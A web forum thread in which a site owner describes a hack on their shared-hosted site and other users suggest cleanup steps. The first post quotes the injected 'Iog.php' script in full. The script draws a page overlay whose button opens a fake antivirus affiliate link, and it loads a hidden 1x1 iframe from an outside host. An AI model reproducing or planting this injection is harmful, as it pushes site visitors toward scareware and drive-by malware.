SitePoint Sponsor

User Tag List

Results 1 to 5 of 5
  1. #1
    SitePoint Enthusiast
    Join Date
    May 2008
    Posts
    88
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Angry site hacked google warnings too...pls help

    I wouldn't have noticed that my site was hacked if Google didn't sent me an email letting me know that he found some hidden keywords in my pages and it breaks their rules and some pages were taken of the index.
    I took a look at my FTP and in that particular domain indeed there were some extra files like this:

    1. a folder named .xdata which contained at least 300 html files with weird names like: 790-sports-animal.com.html; 2010-heisman-odds.html; agua-bella.html and so on. These html files contained urls and keywords
    2. a file named Iog.php which contained the following code:

    PHP Code:
    document.write('<div style="position: absolute; top: 0; left: 0; width: 100%;  height: 4000px;  background-color: #FFFFFF; padding: 0px">');
    function 
    go()
    {
    window.open("http://antyvirusservicenow.com/hitin.php?land=20&affid=34100");
    }
    document.write('<center><table align=center cellpadding=0 cellspacing=0 style="border: 0px solid; border-color: #000000; width: 400px; height: 300px; padding: 30px; margin-top: 100px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #000000;"><tr><td><br><br><br><br><br><br><br><br><br><br><center><input type=submit name=klik id=klik value="-=ENTER=-"  onclick="go();" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 40px; color: red; font-weight: bold; width: 300px; height: 60px; border: 2px solid; cursor: pointer"></center></td></tr></table></center></font></div><iframe src="http://levitt-tupa-wkolota.freehostia.com/k.html" width="1" height="1"></iframe>'); 
    3. a logs file which again has a lot of links and keywords

    I deleted these 2 files and folder but they are created every time. I also changed the .xdata folder permissions to 444 but it still changes itself to 777.

    I couldn't find those keywords hidden in my pages at all.

    Anyone has any clue?

    Thanks

  2. #2
    From space with love silver trophy
    SpacePhoenix's Avatar
    Join Date
    May 2007
    Location
    Poole, UK
    Posts
    5,029
    Mentioned
    103 Post(s)
    Tagged
    0 Thread(s)
    Change your FTP passwords straight away. Check your FTP logs for anything that looks inusual, ie IP address that you don't reconise or FTP acces when you were not at any computer.

    Is your site hosted on a shared server?
    Community Team Advisor
    Forum Guidelines: Posting FAQ Signatures FAQ Self Promotion FAQ
    Help the Mods: What's Fluff? Report Fluff/Spam to a Moderator

  3. #3
    SitePoint Enthusiast
    Join Date
    May 2008
    Posts
    88
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by SpacePhoenix View Post
    Change your FTP passwords straight away. Check your FTP logs for anything that looks inusual, ie IP address that you don't reconise or FTP acces when you were not at any computer.

    Is your site hosted on a shared server?
    i've changed the passwords 3 times already and still nothing...the site is godaddy shared

  4. #4
    From space with love silver trophy
    SpacePhoenix's Avatar
    Join Date
    May 2007
    Location
    Poole, UK
    Posts
    5,029
    Mentioned
    103 Post(s)
    Tagged
    0 Thread(s)
    Run full and complete anti virus, anti spyware, anti malware, etc scans on all computers that you use to access the FTP to the site.
    Community Team Advisor
    Forum Guidelines: Posting FAQ Signatures FAQ Self Promotion FAQ
    Help the Mods: What's Fluff? Report Fluff/Spam to a Moderator

  5. #5
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    it looks like you didnt clean the server properly. from what you tell, there may be a file, or multiple files left on the server to clean/delete. remember that this kind of issues loves to embed itself to other files and run free that way.

    You say you keep changing folder permission, but it keeps changing it back, this may indicate there are still files to clean on your server.
    Who's to doom when the judge himself is dragged before the bar



Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •